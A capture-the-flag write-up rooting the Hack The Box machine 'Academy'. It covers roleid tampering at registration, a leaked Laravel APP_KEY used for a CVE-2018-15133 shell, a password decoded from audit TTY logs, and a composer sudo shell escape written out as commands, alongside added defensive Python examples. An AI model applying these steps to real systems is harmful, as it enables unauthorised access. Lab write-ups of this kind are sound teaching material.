Hack The Box — Academy — Write Up
Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost that is found to be running on Laravel. Laravel debug mode is enabled, and the exposed API key together with a vulnerable version of Laravel allows us to carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel .env file for another application reveals a password that is found to work for the cry0l1t3 user, who is a member of the adm group. This allows us to read system logs, and the TTY input audit logs reveal the password for the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo, which we can leverage in order to escalate our privileges.
Scanning and Enumeration
We’ll start with scanning the machine with Nmap.
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
ssh-hostkey: 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
http-server-header: Apache/2.4.41 (Ubuntu)
http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
fingerprint-strings:
DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
Invalid message"
HY000
The Nmap scan shows that port 22 (SSH), port 80 (HTTP) and port 33060 (MySQL X protocol) are open. Port 80 redirects to http://academy.htb/, so we add the IP address to the /etc/hosts file in order to view the web page. When we visit port 80 we find the HTB Academy web page with two options: Login and Register.
echo "10.10.10.215 academy.htb" >> /etc/hosts # root priv required
We confirm that the website is running PHP by navigating to /index.php. The site has "Login" and "Register" links. Let's enumerate hidden directories and files; we will use dirsearch to enumerate the web server's paths and files.
$ dirsearch.py -u http://academy.htb/
[21:45:39] 200 - 3KB - /admin.php <-- Interesting
[21:46:05] 200 - 0B - /config.php <-- Interesting
[21:46:21] 200 - 2KB - /index.php
[21:46:21] 200 - 2KB - /index.php/login/
[21:46:26] 200 - 3KB - /login.php
[21:46:43] 200 - 3KB - /register.php
Dirsearch reveals a number of PHP files, of which admin.php is the most interesting. Browsing to /admin.php reveals a login page. Attempting to log in with our registered user fails. Let's register a new account again, examine the request in Burp Suite and see if we can bypass the login.
We find that an additional roleid parameter is passed in the registration request. Further recon shows that the roleid parameter decides the account's privilege level, so if we change the roleid parameter from 0 to 1 we obtain administrator privileges. Logging in to login.php with our new credentials doesn't provide us with any additional functionality, but this time we are able to log in at /admin.php.
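The defect behind this bypass is mass assignment: the server copies a client-controlled roleid into the new account. The Python below is an added illustration, not the academy.htb site's own (PHP) code; the form field names uid, password, confirm and roleid, and the role values 0 and 1, are assumptions taken from the request described above.

```python
"""Server-side role assignment at registration (added example, not the site's code).

register_vulnerable() mirrors the observed behaviour: whatever roleid the client
sends becomes the account's role. register_hardened() allowlists the form fields,
assigns the role itself, and records stray parameters so tampering is visible in
application logs.
"""
ROLE_USER = 0    # assumed default role seen in the registration request
ROLE_ADMIN = 1   # assumed value that granted admin access

# Only these fields are accepted from the registration form (assumed names).
REGISTRATION_FIELDS = {"uid", "password", "confirm"}


def register_vulnerable(form):
    """Trusts every submitted field, including roleid (mass assignment)."""
    return {"username": form["uid"], "roleid": int(form.get("roleid", ROLE_USER))}


def register_hardened(form):
    """Ignores unknown fields and always assigns the default role server-side."""
    if form.get("password") != form.get("confirm"):
        raise ValueError("password confirmation mismatch")
    # Anything outside the allowlist is dropped, never copied into the account.
    unexpected = sorted(set(form) - REGISTRATION_FIELDS)
    account = {"username": form["uid"], "roleid": ROLE_USER}
    # A client sending roleid is the tampering signature worth alerting on.
    account["suspicious_fields"] = unexpected
    return account


if __name__ == "__main__":
    tampered = {"uid": "bob", "password": "p", "confirm": "p", "roleid": "1"}
    print("vulnerable:", register_vulnerable(tampered))
    print("hardened:  ", register_hardened(tampered))
```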
After logging in, we're greeted with an "Academy Launch Planner". Several items have been completed, but the last item is still pending (Fix issue with dev-staging-01.academy.htb). Let's add this host to our hosts file, disable the proxy and browse to it.
echo "10.10.10.215 dev-staging-01.academy.htb" >> /etc/hosts # root priv required
The vhost serves a Laravel debug page that discloses sensitive information such as internal paths, server information, environment variables and MySQL credentials, so let's move on to the next step.
Exploitation Phase
Laravel in debug mode also returns sensitive information such as the application key (APP_KEY) and MySQL credentials, which can be found by scrolling down to the "Environment Variables" section.
We exploit the Laravel Framework unserialize token RCE (CVE-2018-15133) with Metasploit, supplying the leaked APP_KEY, to gain a reverse shell.
Privilege Escalation
Looking at /etc/passwd, we notice multiple users on this box. We recall from the Nmap result that there's a MySQL instance listening on port 33060. Laravel uses .env files for database configuration (via the PHP package phpdotenv). On enumerating the file system, we find two Laravel applications configured, htb-academy-dev-01 and academy. Inspection of the academy Laravel application reveals MySQL credentials in its .env. The main Academy application can be found at /var/www/html/academy, with htb-academy-dev-01 at /var/www/html/htb-academy-dev-01. Further information about the Laravel environment configuration file is available in the Laravel documentation. The Academy .env file is below.
Attempting to log in to MySQL using the mysql client with these credentials fails. However, password reuse is common, so let's enumerate the system users and see if any of them use the same password.
The id command reveals that this user is a member of the adm group. The adm group allows users to read system logs, and on Linux most system logs live under /var/log. Let's change directory to /var/log and list the log files.
The Linux audit (auditd) log files in /var/log/audit contain TTY records, and the mrb3n user's credentials appear in them in hexadecimal form.
$ cat audit.log.3 | grep "data"
type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199317.622:93): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
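The data= field of a type=TTY record is the raw keystroke bytes hex-encoded, which is why TTY auditing (pam_tty_audit) captures anything typed at an su prompt and why these files must stay readable only by root and trusted log readers. The parser below is an added example, not part of the original write-up; its sample input reuses three of the records above plus one constructed non-TTY line to show that other record types are skipped.

```python
"""Decode keystrokes from Linux audit TTY records (added example, not the page's code)."""
import re

# Sample input: three TTY records from the log shown above plus one constructed
# SYSCALL record, in the format of /var/log/audit/audit.log.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=SYSCALL msg=audit(1597199308.300:91): arch=c000003e syscall=59 success=yes exit=0
"""

TTY_RE = re.compile(
    r'^type=TTY msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): .*?'
    r' uid=(?P<uid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<data>[0-9A-Fa-f]+)$'
)


def parse_tty_records(log_text):
    """Return one dict per TTY record; records of any other type are skipped."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if not m:
            continue
        raw = bytes.fromhex(m.group("data"))
        records.append({
            "timestamp": float(m.group("ts")),
            "uid": int(m.group("uid")),
            "comm": m.group("comm"),
            # Keystrokes are bytes; decode leniently so stray control bytes survive.
            "keystrokes": raw.decode("utf-8", errors="replace"),
        })
    return records


def reconstruct_session(records):
    """Join decoded keystrokes per uid, in timestamp order, into the lines typed."""
    by_uid = {}
    for rec in sorted(records, key=lambda r: r["timestamp"]):
        by_uid.setdefault(rec["uid"], []).append(rec["keystrokes"])
    return {uid: "".join(parts).strip("\n").split("\n") for uid, parts in by_uid.items()}


if __name__ == "__main__":
    for uid, lines in reconstruct_session(parse_tty_records(SAMPLE_AUDIT_LOG)).items():
        print(f"uid {uid} typed: {lines}")
```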
Running sudo -l with the correct password reveals that mrb3n has a sudo entry allowing them to run composer as root.
There is an entry on GTFOBins for composer. It involves creating a composer.json file with a "scripts" property, since Composer allows users to execute system commands through the scripts section.
After running the following commands, we successfully obtain a shell as root and can read root.txt.
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
!!! MACHINE ROOTED !!!
Visit My Hack The Box Profile —
https://app.hackthebox.eu/profile/464208
For any queries, contact me on my Twitter and LinkedIn profiles.